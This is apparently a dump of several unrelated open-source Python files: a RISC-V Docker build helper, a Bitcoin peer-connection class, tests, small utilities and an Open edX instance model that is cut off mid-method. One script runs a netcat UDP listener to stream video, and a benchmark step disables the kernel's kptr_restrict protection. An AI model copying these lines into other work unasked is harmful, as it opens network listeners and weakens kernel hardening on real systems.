VOLS["build"].create()
VOLS["toolchain"].create()
docker.run("make riscv-gnu-toolchain-newlib")
docker.run("make riscv-gnu-toolchain-linux")
elif name == "emu":
docker.run("make spike")
docker.run("make qemu")
elif name == "llvm":
docker.run("make llvm")
elif name == "sbt":
docker.run("make sbt")
# run sbt tests (all but system)
docker.run('bash -c "' +
# sbt log dir
'mkdir -p junk && ' +
# restore symlinks (needed if in cygwin fs)
'git checkout HEAD test/sbt/rv32-hello.s && ' +
'git checkout HEAD riscv-qemu-tests && ' +
# build and run tests
'. scripts/env.sh && ' +
'make almost-alltests"')
elif name == "dev":
pass
elif name == "gcc7":
if not Docker.BIND:
VOLS["build"].create()
VOLS["toolchain"].create()
docker.run("make riscv-gnu-toolchain-newlib-gcc7")
docker.run("make riscv-gnu-toolchain-linux-gcc7")
docker.run("make llvm-gcc7")
docker.run("make sbt-gcc7")
else:
raise Exception("Invalid: build " + name)
class Images:
def __init__(self):
self.imgs = [
Image("riscv-sbt"),
Image("riscv-gnu-toolchain"),
Image("emu"),
Image("llvm"),
Image("sbt", img="sbt"),
Image("dev"),
Image("gcc7")
]
self._iter = None
def build(self, name, force):
# build all?
if name == "all":
for img in self.imgs:
if img.name == "gcc7":
continue
img.build(force)
return
# find and build img by name
for img in self.imgs:
if img.name == name:
img.build(force)
break
else:
sys.exit("ERROR: component not found: " + args.build)
def __iter__(self):
self._iter = iter(self.imgs)
return self._iter
#
# main
#
if __name__ == "__main__":
imgs = Images()
names = [img.name for img in imgs]
parser = argparse.ArgumentParser(description="docker build helper")
parser.add_argument("--save-current-commits", action="store_true",
help="save the current commit hash of each submodule in commits.txt")
parser.add_argument("--get-srcs", action="store_true",
help="clone and checkout all needed sources")
parser.add_argument("--clean", action="store_true",
help="remove done files from every docker build dir")
parser.add_argument("--clean-imgs", action="store_true",
help="remove <none> and docker related images")
parser.add_argument("--build", metavar="img", type=str,
choices=names + ["all"],
help="build img. imgs=[{}]".format(", ".join(names + ["all"])))
parser.add_argument("-f", "--force", action="store_true",
help="force build")
parser.add_argument("--run", type=str, help="run a docker image")
parser.add_argument("--exec", type=str,
help="exec bash on an existing container")
parser.add_argument("--no-bind", action="store_true",
help="do not use bind mount for all volumes when running a container")
parser.add_argument("--rdev", action="store_true",
help="run dev container")
parser.add_argument("--xdev", action="store_true",
help="exec bash on an existing dev container")
parser.add_argument("--rgcc7", action="store_true",
help="run gcc7 container")
parser.add_argument("--xgcc7", action="store_true",
help="exec bash on an existing gcc7 container")
parser.add_argument("--mibuild", action="store_true",
help="build MiBench benchmarks")
parser.add_argument("--mitest", action="store_true",
help="test MiBench benchmarks")
parser.add_argument("--mirun", action="store_true",
help="run MiBench benchmarks, measuring times")
args = parser.parse_args()
if args.no_bind:
Docker.BIND = False
def run(img):
name = img.replace("sbt-", "")
docker = Docker(name, img)
docker.run(interactive=True)
def exec(img):
name = img.replace("sbt-", "")
docker = Docker(name, img)
docker.exec("/bin/bash", interactive=True)
# --save-current-commits
if args.save_current_commits:
commits = Commits(TOPDIR, DOCKER_DIR)
commits.save(commits.get_current())
# --get-srcs
elif args.get_srcs:
srcs = Sources()
srcs.get()
# --clean
elif args.clean:
with cd(DOCKER_DIR):
shell("rm -f {}".format(
" ".join([name + "/done" for name in names])))
# --clean-imgs
elif args.clean_imgs:
Helper.clean_imgs()
# --build
elif args.build:
imgs.build(args.build, args.force)
# --run
elif args.run:
run(args.run)
# --exec
elif args.exec:
exec(args.exec)
# --rdev
elif args.rdev:
run("sbt-dev")
# --xdev
elif args.xdev:
exec("dev")
# --rgcc7
elif args.rgcc7:
run("sbt-gcc7")
# --xgcc7
elif args.xgcc7:
exec("gcc7")
# --mibuild
elif args.mibuild:
docker = Docker("sbt", "sbt")
docker.run('bash -c "' +
'. scripts/env.sh && ' +
'cd mibench && ' +
'./genmake.py --no-arm && ' +
'make clean benchs"')
# --mitest
elif args.mitest:
Docker("sbt", "sbt").run("make -C mibench benchs-test")
# --mirun
elif args.mirun:
Docker("sbt", "sbt").run('bash -c "' +
'. scripts/env.sh && ' +
'mount -t tmpfs tmpfs /tmp && ' +
'echo 0 > /proc/sys/kernel/kptr_restrict && ' +
'make -C mibench benchs-measure"')
# error
else:
sys.exit("ERROR: no command specified")
| OpenISA/riscv-sbt | docker/build.py | Python | mit | 15,183 |
import socket
import threading
import Queue
from bitcoin.net import PROTO_VERSION
from bitcoin.messages import MsgSerializable
class PeerConn(threading.Thread):
def __init__(self, conn, protover=PROTO_VERSION):
"""Pass in an established connection."""
self.conn = conn
self.peername = conn.getpeername()
self.protover = protover
self.recvq = Queue.Queue()
self.sendq = Queue.Queue()
self._stopflag = threading.Event()
super(PeerConn, self).__init__()
def run(self):
sendhandler = threading.Thread(target=self._handle_send)
recvhandler = threading.Thread(target=self._handle_recv)
sendhandler.start()
recvhandler.start()
recvhandler.join()
self.stop()
sendhandler.join()
def send(self, msg):
if msg is None:
# Disallow, because None msg is a signal to stop.
# Use self.stop to close the connection.
raise ValueError("Msg must not be None.")
self.sendq.put(msg)
def recv(self):
try:
return self.recvq.get(block=False)
except Queue.Empty:
return None
def _handle_send(self):
while True:
msg = self.sendq.get()
if msg is None:
break
try:
msg.stream_serialize(self.conn.makefile(mode='w'))
except Exception as e:
print("Msg send error: {}".format(e))
def _handle_recv(self):
while True:
try:
msg = MsgSerializable.stream_deserialize(
self.conn.makefile(mode='r'),
protover=self.protover)
except Exception as e:
msg = e
if not self._stopflag.is_set():
print("Peer connection closed unexpectedly.")
break
finally:
self.recvq.put(msg)
def stop(self):
self._stopflag.set()
self.sendq.put(None)
try:
self.conn.shutdown(socket.SHUT_RDWR)
except:
pass
self.conn.close()
class MsgList(list):
MAXDISPLAYLEN = 72
def msgrepr(self, msg):
m = repr(msg)
if len(m) > self.MAXDISPLAYLEN:
m = m[:self.MAXDISPLAYLEN] + "..."
return m
def __repr__(self):
return "\n".join([
"{:<3}: {}".format(i, self.msgrepr(msg))
for i, msg in enumerate(self)])
| bitcoinfees/talkbitcoin | _talkbitcoin.py | Python | mit | 2,510 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import subprocess
running = os.system("nc -u -l -p 5001 | mplayer -cache 1024 -")
#subprocess.check_call('/opt/vc/bin/raspivid -n -w 800 -h 600 -fps 24 -t 0 -o - | socat - udp-sendto:' + '129.16.194.248' + ':5001')
| twistedretard/LaserSimulatedSecurityTurret | src/streaming/server.py | Python | mit | 272 |
import confutil
from skitai.handlers import collectors
from atila import grpc_collector
from examples.services import route_guide_pb2
from atila import multipart_collector
import pytest
from skitai import testutil
@pytest.fixture
def handler (wasc):
return testutil.install_vhost_handler ()
@pytest.fixture
def post (client):
return client.post ("http://www.skitai.com/", {"a": "b"})
@pytest.fixture
def multipart (client):
return client.upload ("http://www.skitai.com/", {"a": "b", "file": open ('./examples/statics/reindeer.jpg', "rb")})
@pytest.fixture
def grpc (client):
point = route_guide_pb2.Point (latitude=409146138, longitude=-746188906)
return client.grpc ("http://www.skitai.com/routeguide.RouteGuide").GetFeature (point)
def test_form_collector (handler, post):
c = collectors.FormCollector (handler, post)
def test_h2dummy_collector (handler, post):
c = collectors.HTTP2DummyCollector (handler, post, 200)
def test_multipart_collector (handler, multipart):
c = collectors.MultipartCollector (handler, multipart, 1024, 2048, 512)
def test_alita_multipart_collector (handler, multipart):
c = multipart_collector.MultipartCollector (handler, multipart, 1024, 2048, 512)
def test_alita_grpc_collector (handler, grpc):
c = grpc_collector.grpc_collector (handler, grpc)
| hansroh/skitai | tests/level1/test_collectors.py | Python | mit | 1,310 |
# Copyright (c) 2013 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Module containing the Table class used to represent a table."""
from display.row import Row
class Table:
"""Class used to represent a table with specified columns.
To build it, you have two options:
Call the constructor with each column name as a positional argument
Call the constructor and then use the 'add_column' method
After setting up the right amount of columns you can use the
'add_row' method. This method will return a Row object (see the
'display.row' module) and you will be able to add new informations
in it. Here is a sample of code using tables:
>>> from display.table import Table
>>> contacts = Table("First name", "Name", "job")
>>> # Note that you can achive the same by doing for instance:
>>> # contacts = Table("First name", "Name")
>>> # contacts.add_column("job")
>>> contacts.add_row("Mike", "Arthur", "developer")
>>> row = contact.add_row("John", "Wingham")
>>> row.set("job", "designer")
>>> print(contacts)
+------------+---------+-----------+
| First name | Name | Job |
+------------+---------+-----------+
| Mike | Arthur | developer |
| John | Wingham | designer |
+------------+---------+-----------+
Methods to sort and present the table are also provided.
"""
def __init__(self, *columns, column_separator=" | ", left_border="| ",
right_border=" |"):
self.columns = list(columns)
self.rows = []
self.column_separator = column_separator
self.left_border = left_border
self.right_border = right_border
def __repr__(self):
return "<table of {} columns on {} rows".format(len(self.columns),
len(self.rows))
def __str__(self):
return self.display()
def add_column(self, name):
"""Add a new column."""
self.columns.append(name)
def add_row(self, *contents):
"""Add a new row with each column content as a positional argument.
You can partly fill a row and then set new informations. This
method return the newly created row and you can manipulate
it to update its content.
"""
row = Row(self)
row.set_contents(*contents)
self.rows.append(row)
return row
def display(self):
"""Display the table."""
column_sizes = []
for column in self.columns:
column_sizes.append(len(column))
for row in self.rows:
for i, column in enumerate(row):
length = column_sizes[i]
if length < len(column):
column_sizes[i] = len(column)
length_line = sum(column_sizes) + len(self.column_separator) * \
len(self.columns)
length_line += len(self.left_border) + len(self.right_border)
if length_line > 79:
raise ValueError("line too long")
lines = []
line_format = self.left_border
for i, size in enumerate(column_sizes):
if i > 0:
line_format += self.column_separator
line_format += "{:<" + str(size) + "}"
line_format += self.right_border
lines.append(line_format.format(*self.columns))
for row in self.rows:
lines.append(line_format.format(*row.datas))
return "\n".join(lines)
def sort_by(self, *columns):
"""Sort by the specified columns.
The columns should be specified using their names. If you
create a table with the columns "first name" and "name" for
instance, you can use .sort_by("name") to sort the lines by
the 'name' column. You can specify multiple column names like:
>>> table = Table("first name", "name", "job")
>>> # Add several rows...
>>> table.sort_by("name", "first name") # will sort by name and then first name
"""
indices = []
for column in columns:
if column in self.columns:
indices.append(self.columns.index(column))
else:
raise ValueError("the column {} is not present in this " \
"table".format(repr(column)))
self.rows.sort(key=lambda row: row.get_tuple(*columns))
| v-legoff/pa-poc3 | src/display/table.py | Python | bsd-3-clause | 5,852 |
def palindrome2(x):
x = str(x)
return x == x[::-1]
| ultranaut/illacceptanything | code/palindrome2.py | Python | mit | 59 |
"""Modoboa compatibility matrix."""
COMPATIBILITY_MATRIX = {
"1.8.1": {
"modoboa-pdfcredentials": "<=1.1.0",
"modoboa-sievefilters": "<=1.1.0",
"modoboa-webmail": "<=1.1.5",
},
"1.8.2": {
"modoboa-pdfcredentials": ">=1.1.1",
"modoboa-sievefilters": ">=1.1.1",
"modoboa-webmail": ">=1.2.0",
},
"1.8.3": {
"modoboa-pdfcredentials": ">=1.1.1",
"modoboa-sievefilters": ">=1.1.1",
"modoboa-webmail": ">=1.2.0",
},
"1.9.0": {
"modoboa-pdfcredentials": ">=1.1.1",
"modoboa-sievefilters": ">=1.1.1",
"modoboa-webmail": ">=1.2.0",
}
}
EXTENSIONS_AVAILABILITY = {
"modoboa-contacts": "1.7.4",
}
| modoboa/modoboa-installer | modoboa_installer/compatibility_matrix.py | Python | mit | 719 |
# -*- coding: utf-8 -*-
#
# OpenCraft -- tools to aid developing and hosting free software projects
# Copyright (C) 2015-2019 OpenCraft <xavier@opencraft.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Instance app models - Open edX Instance models
"""
import string
import re
from django.core.cache import cache
from django.conf import settings
from django.db import models, transaction
from django.db.backends.utils import truncate_name
from django.db.models import F
from django.template import loader
from django.urls import reverse
from django.utils import timezone
from instance import gandi
from instance.logging import log_exception
from instance.models.appserver import Status as AppServerStatus
from instance.models.instance import Instance
from instance.models.load_balancer import LoadBalancingServer
from instance.models.mixins.domain_names import DomainNameInstance
from instance.models.mixins.load_balanced import LoadBalancedInstance
from instance.models.mixins.openedx_static_content_overrides import OpenEdXStaticContentOverridesMixin
from instance.models.mixins.openedx_database import OpenEdXDatabaseMixin
from instance.models.mixins.openedx_monitoring import OpenEdXMonitoringMixin
from instance.models.mixins.openedx_periodic_builds import OpenEdXPeriodicBuildsMixin
from instance.models.mixins.openedx_site_configuration import OpenEdXSiteConfigurationMixin
from instance.models.mixins.openedx_storage import OpenEdXStorageMixin
from instance.models.mixins.openedx_theme import OpenEdXThemeMixin
from instance.models.mixins.secret_keys import SecretKeyInstanceMixin
from instance.models.openedx_appserver import OpenEdXAppConfiguration
from instance.models.utils import ConsulAgent, WrongStateException, get_base_playbook_name
from instance.signals import appserver_spawned
from instance.utils import sufficient_time_passed
# Models ######################################################################
class OpenEdXInstance(
DomainNameInstance,
LoadBalancedInstance,
OpenEdXAppConfiguration,
OpenEdXStaticContentOverridesMixin,
OpenEdXDatabaseMixin,
OpenEdXMonitoringMixin,
OpenEdXStorageMixin,
OpenEdXThemeMixin,
OpenEdXPeriodicBuildsMixin,
OpenEdXSiteConfigurationMixin,
SecretKeyInstanceMixin,
Instance
):
"""
OpenEdXInstance: represents a website or set of affiliated websites powered by the same
OpenEdX installation.
"""
# Most settings/fields are inherited from mixins
successfully_provisioned = models.BooleanField(default=False)
database_name = models.CharField(blank=False, unique=True, max_length=60)
def __init__(self, *args, **kwargs):
"""Init."""
self.random_prefix = kwargs.pop('random_prefix', None)
super().__init__(*args, **kwargs)
class Meta:
verbose_name = 'Open edX Instance'
def __str__(self):
return "{} ({})".format(self.name, self.domain)
def get_absolute_url(self):
"""
Return link to the instance admin page, e.g. /instance/210/
This link is shown in Django's admin.
"""
return reverse('instance:index') + str(self.ref.id) + "/"
@property
def admin_url(self):
"""
Returns the admin url for an instance
"""
return reverse('admin:instance_openedxinstance_change', args=(self.id,))
def get_active_appservers(self):
"""
Returns a queryset containing the active appservers.
"""
if hasattr(self.ref, '_cached_active_appservers'):
# A database optimization like prefetch_related() has computed the active
# appservers for a large number of instances and cached that result on
# the InstanceReference of each one.
# (This is used to optimize the /api/v1/instances/ endpoint query for example)
return self.ref._cached_active_appservers
return self.appserver_set.filter(_is_active=True)
def get_latest_deployment(self):
""" The latest OpenEdXDeployment associated with this instance. """
deployment = super(OpenEdXInstance, self).get_latest_deployment()
if deployment:
return deployment.openedxdeployment
return None
def generate_database_name(self):
"""
The database name used for external databases/storages, if any.
"""
name = self.internal_lms_domain.replace('.', '_')
# Escape all non-ascii characters and truncate to 50 chars.
# The maximum length for the name of a MySQL database is 64 characters.
# But since we add suffixes to database_name to generate unique database names
# for different services (e.g. xqueue) we don't want to use the maximum length here.
allowed = string.ascii_letters + string.digits + '_'
escaped = ''.join(char for char in name if char in allowed)
return truncate_name(escaped, length=40)
def save(self, **kwargs):
"""
Set default values before saving the instance.
"""
# Set default field values from settings - using the `default` field attribute confuses
# automatically generated migrations, generating a new one when settings don't match
if not self.edx_platform_commit:
self.edx_platform_commit = self.openedx_release
if self.storage_type is None:
self.storage_type = settings.INSTANCE_STORAGE_TYPE
# If left blank, the base playbook name will be automatically selected
# based on the openedx release
if not self.configuration_playbook_name:
self.configuration_playbook_name = get_base_playbook_name(self.openedx_release)
if self.random_prefix is not None:
self.mysql_user = self.random_prefix
if not self.database_name:
self.database_name = self.generate_database_name()
# The instance is newly created
if not self.pk:
self.logger.info('successful_instance_create: %s', str(self))
super().save(**kwargs)
self.update_consul_metadata()
def get_load_balancer_configuration(self, triggered_by_instance=False):
"""
Return the haproxy configuration fragment and backend map for this instance.
The triggered_by_instance flag indicates whether the reconfiguration was initiated by this
instance, in which case we log additional information.
"""
if settings.DISABLE_LOAD_BALANCER_CONFIGURATION:
self.logger.info(
'Direct load balancer reconfiguration disabled. No haproxy '
'configuration fragment and backend map will be generated.'
)
return [], []
active_appservers = self.get_active_appservers()
if not active_appservers.exists():
return self.get_preliminary_page_config(self.ref.pk)
# Create the haproxy backend configuration from the list of active appservers
appserver_vars = []
for appserver in active_appservers:
server_name = "appserver-{}".format(appserver.pk)
if not appserver.server.public_ip:
self.logger.error(
"Active appserver does not have a public IP address. This should not happen. "
"Updating internal status to double check."
)
appserver.server.update_status()
if not appserver.server.public_ip:
raise WrongStateException("Public IP still not available for active appserver. "
"Canceling reconfiguration process.")
appserver_vars.append(dict(ip_address=appserver.server.public_ip, name=server_name))
if not appserver_vars:
self.logger.error(
"No active appservers found with public IP addresses. This should not happen. "
"Deconfiguring the load balancer backend."
)
return [], []
backend_name = "be-{}".format(self.domain_slug)
template = loader.get_template("instance/haproxy/openedx.conf")
config = template.render(dict(
domain=self.domain,
http_auth_info_base64=self.http_auth_info_base64(),
appservers=appserver_vars,
health_check=len(appserver_vars) > 1,
))
backend_map = [(domain, backend_name) for domain in self.get_load_balanced_domains()]
backend_conf = [(backend_name, config)]
if self.enable_prefix_domains_redirect:
redirect_backend_name = "be-redirect-{}".format(self.domain_slug)
redirect_template = loader.get_template('instance/haproxy/redirect.conf')
redirect_config = redirect_template.render(dict(
domain=self.internal_lms_domain
))
backend_map += [(domain, redirect_backend_name) for domain in self.get_prefix_domain_names()]
backend_conf += [(redirect_backend_name, redirect_config)]
if triggered_by_instance:
self.logger.info(
"New load-balancer configuration:\n backend map: %s\n configuration: %s",
backend_map,
backend_conf,
)
return backend_map, backend_conf
def set_active_vm_dns_records(self, deactivate_appserver=False):
"""
Set DNS A records for all active app servers.
"""
self.logger.info("Setting DNS records for active app servers...")
with cache.lock('appserver_dns_record_update_{}'.format(self.ref.instance_id)):
active_appservers = self.get_active_appservers()
for i, appserver in enumerate(active_appservers, 1):
ip_addr = appserver.server.public_ip
if ip_addr:
domain = "vm{index}.{base_domain}".format(index=i, base_domain=self.internal_lms_domain)
gandi.api.set_dns_record(domain, type="A", value=ip_addr)
if deactivate_appserver:
unused_dns_index = active_appservers.count() + 1
domain = "vm{index}.{base_domain}".format(index=unused_dns_index, base_domain=self.internal_lms_domain)
gandi.api.remove_dns_record(domain, type="A")
def clean_up_appserver_dns_records(self):
"""
Removes the DNS records for the app servers.
"""
self.logger.info("Cleaning up DNS records for app servers...")
with cache.lock('appserver_dns_record_update_{}'.format(self.ref.instance_id)):
for i, _ in enumerate(self.get_active_appservers(), 1):
domain = "vm{index}.{base_domain}".format(index=i, base_domain=self.internal_lms_domain)
gandi.api.remove_dns_record(domain, type="A")
@property
def appserver_set(self):
"""
Get the set of OpenEdxAppServers owned by this instance.
"""
return self.ref.openedxappserver_set
@property
def first_activated(self):
"""
Returns the activation date for the first activated ``AppServer`` for
this instance, or ``None`` if there is no AppServer, or no AppServer
has yet been activated.
:return: Union[None, datetime]
"""
try:
first_activated_appserver = self.appserver_set.filter(
last_activated__isnull=False
).earliest('last_activated')
return first_activated_appserver.last_activated
except models.ObjectDoesNotExist:
return None
@property
def latest_archiving_date(self):
"""
Returns the datetime the instance has been most recently archived.
:return: Union[None, datetime]
"""
relevant_log_regex = r'Archiving instance finished.'
relevant_log_entries = [l for l in self.log_entries if re.search(relevant_log_regex, l.text)]
if not self.ref.is_archived or not relevant_log_entries:
# We need log entries to determine when the instance has most recently been archived
return None
return max([l.created for l in relevant_log_entries])
def _spawn_appserver(self, deployment_id=None):
"""
Provision a new AppServer
Returns the ID of the new AppServer on success or None on failure.
"""
if not self.load_balancing_server:
self.load_balancing_server = LoadBalancingServer.objects.select_random()
self.save()
self.reconfigure_load_balancer()
# We unconditionally set the DNS records here, though this would only be strictly needed
# when the first AppServer is spawned. However, there is no easy way to tell whether the
# DNS records have already been successfully set, and it doesn't hurt to always do it.
self.set_dns_records()
# Provision external databases:
# TODO: Use db row-level locking to ensure we don't get any race conditions when creating these DBs.
# Use select_for_update(nowait=True) to lock this object's row, then do these steps, then refresh_from_db
self.logger.info('Provisioning MySQL database...')
self.provision_mysql()
self.logger.info('Provisioning MongoDB databases...')
self.provision_mongo()
if self.storage_type == self.SWIFT_STORAGE:
self.logger.info('Provisioning Swift container...')
self.provision_swift()
elif self.storage_type == self.S3_STORAGE:
self.logger.info('Provisioning S3 bucket...')
self.provision_s3()
if self.cache_db == OpenEdXDatabaseMixin.REDIS:
self.logger.info('Provisioning Redis user ACL...')
self.provision_redis()
elif self.cache_db == OpenEdXDatabaseMixin.RABBIT_MQ:
self.logger.info('Provisioning RabbitMQ vhost...')
self.provision_rabbitmq()
else:
raise NotImplementedError(f"{self.cache_db} does not provision any cache DBs")
return self._create_owned_appserver(deployment_id=deployment_id)
@log_exception
def spawn_appserver(self,
mark_active_on_success=False,
num_attempts=1,
success_tag=None,
failure_tag=None,
deployment_id=None):
"""
Provision a new AppServer
Wrapper around the spawning function to allow for multiple attempts
Optionally mark the new AppServer as active when the provisioning completes.
Optionally retry up to 'num_attempts' times.
Optionally tag the instance with 'success_tag' when the deployment succeeds,
or failure_tag if it fails.
Returns the ID of the new AppServer or None in case of failure.
"""
# pylint: disable=cyclic-import, useless-suppression
from instance.models.openedx_deployment import OpenEdXDeployment
for attempt in range(num_attempts):
self.logger.info("Spawning new AppServer, attempt {} of {}".format(attempt + 1, num_attempts))
app_server = self._spawn_appserver(deployment_id=deployment_id)
if app_server and app_server.provision():
break
# Don't retry if the deployment was explicitly cancelled.
if deployment_id:
deployment = OpenEdXDeployment.objects.get(pk=deployment_id)
if deployment.cancelled:
self.logger.info('Deployment %s was cancelled, returning.', deployment_id)
return None
self.logger.error('Failed to provision new app server')
else:
self.logger.error('Failed to provision new app server after {} attempts'.format(num_attempts))
if failure_tag:
self.tags.add(failure_tag)
if success_tag:
self.tags.remove(success_tag)
# Warn spawn failed after given attempts
appserver_spawned.send(sender=self.__class__, instance=self, appserver=None, deployment_id=deployment_id)
return None
self.logger.info('Provisioned new app server, %s', app_server.name)
self.successfully_provisioned = True
self.save()
if failure_tag:
self.tags.remove(failure_tag)
if success_tag:
self.tags.add(success_tag)
if mark_active_on_success:
# use task.make_appserver_active to allow disabling others
app_server.make_active()
appserver_spawned.send(sender=self.__class__, instance=self, appserver=app_server, deployment_id=deployment_id)
return app_server.pk
def _create_owned_appserver(self, deployment_id=None):
"""
Core internal code that actually creates the child appserver.
The only reason this is separated from the public spawn_appserver() method is so that
tests can use this core code as an AppServer factory.
This method should never be used directly, except in tests.
Use spawn_appserver() instead.
"""
config_fields = OpenEdXAppConfiguration.get_config_fields()
instance_config = {field_name: getattr(self, field_name) for field_name in config_fields}
with transaction.atomic():
app_server = self.appserver_set.create(
# Name for the app server: this will usually generate a unique name (and won't cause any issues if not):
name="AppServer {}".format(self.appserver_set.count() + 1),
deployment_id=deployment_id,
# Copy the current value of each setting into the AppServer, preserving it permanently:
configuration_database_settings=self.get_database_settings(),
configuration_storage_settings=self.get_storage_settings(),
configuration_theme_settings=self.get_theme_settings(),
configuration_site_configuration_settings=self.get_site_configuration_settings(),
configuration_secret_keys=self.get_secret_key_settings(),
**instance_config
)
app_server.add_lms_users(self.lms_users.all())
return app_server
def require_user_creation_success(self):
"""
When provisioning users, we don't want to force incompatible changes (e.g., in email)
if we've previously provisioned a database with the variables we were interested in initially.
This method returns false if we've provisioned an appserver (read: database) for this instance
in the past.
"""
return not self.successfully_provisioned
def terminate_obsolete_appservers(self, days=2):
"""
Terminate app servers that were created more than `days` before now, except:
- the active appserver(s) if there are any,
- a release candidate (rc) appserver, to allow testing before the next appserver activation
(we keep the most recent running appserver)
- a fallback appserver, for `days` after activating an appserver, to allow reverts
(we keep the most recent running appserver created before the latest activation)
"""
latest_active_appserver = None
if self.get_active_appservers().exists():
latest_active_appserver = self.get_active_appservers().latest('last_activated')
fallback_appserver = None
rc_appserver = None
now = timezone.now()
for appserver in self.appserver_set.all().order_by('-created'):
# Skip active appservers
if appserver.is_active:
continue
# Keep a running appserver as fallback for `days` after latest activation, to allow reverts
if latest_active_appserver and appserver.created < latest_active_appserver.last_activated:
if not sufficient_time_passed(latest_active_appserver.last_activated, now, days) \
and not fallback_appserver and appserver.status == AppServerStatus.Running:
fallback_appserver = appserver
elif sufficient_time_passed(appserver.created, now, days):
appserver.terminate_vm()
# Keep the most recent running appserver created after activation (or when none is activated)
# to allow testing of a release candidate (rc)
else:
if not rc_appserver and appserver.status == AppServerStatus.Running:
rc_appserver = appserver
elif sufficient_time_passed(appserver.created, now, days):
appserver.terminate_vm()
def archive(self, **kwargs):
"""
Shut down this instance's app servers, mark it as archived and
remove its metadata from Consul.
"""
ignore_errors = kwargs.pop('ignore_errors', False)
self.logger.info('Archiving instance started.')
self.disable_monitoring()
active_appservers = self.get_active_appservers()
if active_appservers.count() > 0:
self.clean_up_appserver_dns_records()
self.remove_dns_records(ignore_errors=ignore_errors)
if self.load_balancing_server is not None:
load_balancer = self.load_balancing_server
self.load_balancing_server = None
self.save()
self.reconfigure_load_balancer(load_balancer)
for appserver in self.appserver_set.iterator():
appserver.terminate_vm()
self.deprovision_rabbitmq()
self.purge_consul_metadata()
self.disable_users()
super().archive()
self.logger.info('Archiving instance finished.')
def disable_users(self):
"""
Deactivate users associated with this instance.
"""
lms_users = self.lms_users.filter(is_superuser=False)
for user in lms_users:
user.is_active = False
user.save()
@staticmethod
def shut_down():
"""
The shut_down() functionality was replaced with archive() - remind shell users who run this directly.
"""
raise AttributeError(
"Use archive() to shut down all of an instances app servers and remove it from the instance list."
)
def delete(self, *args, **kwargs): # pylint: disable=arguments-differ
"""
Delete this Open edX Instance and its associated AppServers, and deprovision external databases and storage.
This is handy for development but should not be used in production - just use archive() instead.
Note:
There is no boolean flag to ignore Swift or S3 errors
because when calling `self.deprovision_swfit()` or
`self.deprovision_s3()` errors are logged but not raised.
Arguments:
ignore_errors (bool): Ignore all errors if `True`.
ignore_mysql_errros (bool): Ignore MySQL errors.
ignore_mongo_errors (bool): Ignore Mongo errors.
ignore_rabbitmq_errors (bool): Ignore RabbitMQ errors.
"""
self.logger.info('Deleting instance: %s.', str(self))
ignore_errors = kwargs.pop('ignore_errors', False)
self.archive(ignore_errors=kwargs.pop('ignore_archive_errors', ignore_errors))
self.deprovision_mysql(ignore_errors=kwargs.pop('ignore_mysql_errors', ignore_errors))
self.deprovision_mongo(ignore_errors=kwargs.pop('ignore_mongo_errors', ignore_errors))
self.deprovision_swift()
self.deprovision_s3()
self.deprovision_rabbitmq(ignore_errors=kwargs.pop('ignore_rabbitmq_errors', ignore_errors))
super().delete(*args, **kwargs)
@property
def consul_prefix(self):
"""
This is a property that helps determining a specific instance's rpefix in
Consul. The prefix helps in keeping different instances' configurations
separate from overridings and modifications.
:return: A unique Key-Value prefix for this instance in Consul.
"""
return settings.CONSUL_PREFIX.format(ocim=settings.OCIM_ID, instance=self.id)
def _generate_consul_metadata(self):
"""
Collects required configurations for this instance to reflect on Consul.
You can add, delete or alter configurations keys and values here which are
going to ve reflected in Consul immediately.
:return: A dict of the configurations.
"""
dns_records_updated = self.dns_records_updated.timestamp() if self.dns_records_updated else None
active_servers = self.get_active_appservers()
basic_auth = self.http_auth_info_base64()
enable_health_checks = active_servers.count() > 1
active_servers_data = list(active_servers.annotate(public_ip=F('server___public_ip')).values('id', 'public_ip'))
return {
'domain_slug': self.domain_slug,
'domain': self.domain,
'name': self.name,
'domains': self.get_load_balanced_domains(),
'dns_records_updated': dns_records_updated,
'health_checks_enabled': enable_health_checks,
'basic_auth': basic_auth,
'active_app_servers': active_servers_data,
}
def _write_metadata_to_consul(self, configurations):
"""
Reflect passed configurations to Consul.
If we successfully updated at least one field in Consul
then the configurations' version number is incremented.
:note: This still doesn't apply removed-configurations case.
:param configurations: A dict object contains the configurations
to be written on Consul.
:return: A pair (version, changed) with the current version number and
a bool to indicate whether the information was updated.
"""
return ConsulAgent(prefix=self.consul_prefix).create_or_update_dict(configurations)
def update_consul_metadata(self):
"""
This method is going over some pre-defined configurations fields
in this model to reflect their values on Consul.
If we successfully updated at least one field in Consul
then the configurations' version number is gonna be incremented.
:return: A pair (version, changed) with the current version number and
a bool to indicate whether the information was updated.
"""
if not settings.CONSUL_ENABLED or self.ref.is_archived:
